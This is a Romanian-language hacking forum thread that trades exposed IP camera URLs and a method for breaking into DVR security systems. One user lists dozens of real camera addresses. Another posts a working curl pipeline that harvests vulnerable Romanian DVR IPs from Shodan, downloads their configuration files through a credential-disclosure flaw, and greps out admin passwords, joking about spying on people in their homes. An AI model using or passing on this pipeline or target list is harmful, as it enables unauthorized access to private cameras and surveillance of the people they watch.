Guest CM3D Posted December 19, 2014 Report Posted December 19, 2014 http://193.138.213.169/CgiStart?page=Single&Language=9http://aassdd.viewnetcam.com/CgiStart?page=Multi&Language=0http://74.50.147.9/CgiStart?page=Single&Language=0http://210.146.47.71/CgiStart?page=Single&Language=1http://gujoayu.miemasu.net/CgiStart?page=Single&Language=1http://173.190.94.9/CgiStart?page=Single&Language=0http://shibuya.ipcam.jp:60001/CgiStart?page=Single&Language=1http://skycam.sebewaing.net/CgiStart?page=Single&Language=0http://219.121.16.30:81/CgiStart?page=Single&Language=1http://41.75.32.26:8000/CgiStart?page=Single&Language=0http://71.248.101.58:50001/CgiStart?page=Single&Language=0http://59.146.77.13/CgiStart?page=Single&Language=1http://www.cgistart.com/CgiStart?page=Single&Language=13http://111.93.128.70:8081/CgiStart?page=Single&Language=0http://webcam.salisbury.edu/view/view.shtml?id=2471742&imagePath=/mjpg/video.mjpg&size=1http://c-cam.uchicago.edu/view/view.shtml?id=136644&imagePath=/mjpg/video.mjpg&size=1http://terrascam.heerenvanbeijerland.nl/http://untersbergcam2.xlink.at/http://um.stargard.pl:5000/view/view.shtml?videos=onehttp://webcam.gsg.goe.ni.schule.de/http://labicams.cs.lsus.edu:8081/http://tangvagen.axiscam.net:443/view/view.shtml?videos=onehttp://80.14.165.8/view/index.shtmlhttp://teamkleijn.nl:83/view/index.shtmlhttp://webcam.depoort.nl:8080/http://128.208.252.2/http://camera.mesalands.edu/ViewerFrame?Mode=Motion&Language=0http://212.96.169.238/ViewerFrame?Mode=Motion&Language=8http://75.145.222.133:7505/ViewerFrame?Mode=Motion&Language=0http://sciencecentercam.fas.harvard.edu/view/indexFrame.shtml @MadalinCSD , E greu sa fii hacker mancatias Quote
Aerosol Posted December 19, 2014 Report Posted December 19, 2014 sunt din RO?care este scopul?Sunt si din RO probabil...scopul? vezi ce fac altii Quote
Eddie91 Posted December 19, 2014 Report Posted December 19, 2014 @blech - Acelasi scop prin care au dezvaluit cei la Cyber Smart Defence cat de greu e sa spargi o parola default a unei gradinite la IlikeIT .Mai precis : FIX pula , 0 , null , nimic , canci Quote
blech Posted December 19, 2014 Report Posted December 19, 2014 (edited) pentru ca vineri si pentru ca lene am copiat requestul direct de la mine din browser cu cookie-ul si session-id-ul meu...o sa fie valid putin timp dar pentru un POC este suficient.curl "https://www.shodan.io/search?query=Basic+realm"%"3D"%"22DVR"%"22+server"%"3A+httpd+-mini" -H "dnt: 1" -H "accept-encoding: gzip, deflate, sdch" -H "accept-language: en-US,en;q=0.8" -H "user-agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" -H "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8" -H "referer: https://www.shodan.io/" -H "cookie: __cfduid=dcc0d7c3112ff420a0f8bf085f509f5111412846945898; polito=""a7d885a4a27ba995f6203c45c98c2ecf548eccf751052e3c46614851070021e4""; _LOCmnALE_=None; _ga=GA1.2.871284508.1412846949; _gat=1" --compressed | grep -E -o '(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)' | sort | uniq si primesti asta: 114.34.21.86116.0.62.179122.117.162.212122.117.230.38193.84.186.165220.132.252.7220.134.211.10859.127.226.10979.49.105.17387.22.52.123avand in vedere ca ma folosesc de vulnerabilitatea asta: Hunt CCTV Credential Disclosure ? Packet Stormpoti modifica requestul in:curl "https://www.shodan.io/search?query=Basic+realm"%"3D"%"22DVR"%"22+server"%"3A+httpd+-mini" -H "dnt: 1" -H "accept-encoding: gzip, deflate, sdch" -H "accept-language: en-US,en;q=0.8" -H "user-agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" -H "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8" -H "referer: https://www.shodan.io/" -H "cookie: __cfduid=dcc0d7c3112ff420a0f8bf085f509f5111412846945898; polito=""a7d885a4a27ba995f6203c45c98c2ecf548eccf751052e3c46614851070021e4""; _LOCmnALE_=None; _ga=GA1.2.871284508.1412846949; _gat=1" --compressed | grep -E -o '(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)' | sort | uniq | while read line ; do curl -v http://$line/DVR.cfg ; done > config_camere.txt astfel incat sa descarcati cu CURL direct fisierele de config. si o sa vezi acolo ip camera, user, parola...etc.daca vreti sa o faceti ca la carte faceti requesturile folosind direct API-ul https://developer.shodan.io/api pentru ca in requestul meu este facut pull doar la prima pagina.ca sa-ti faci o idee am folosit dork-ul asta pentru shodan: country:ro Basic realm="DVR" server: httpd -minise poate modifica dupa nevoie astfel incat sa targhetezi anumite zone... puteam adauga si "city:bucharest"daca ai folosi doar dork-ul principal fara filtre: Basic realm="DVR" server: httpd -mini Showing results 1 - 10 of 144,634oricum ala de la CSD nu vroia sa se dea mare hacker...ce a aratat el la TV este pentru mase nu pentru noi care mai avem o idee despre ce cu ce se mananca. aia a fost doar publicitate.sper ca nu v-am dat prea multe idei acum sa incepeti sa va uitati la oameni prin casele lor ) @AerosolLE: si ca sa nu va chinuiti sa cautati userul si parola prin config... cat fisier.txt | strings |grep -i WEB_ADMIN_ Edited December 19, 2014 by blech Quote
Terry.Crews Posted December 20, 2014 Report Posted December 20, 2014 Deci sugaciu asta ma speriat http://i.imgur.com/Y9dnY5u.png Quote
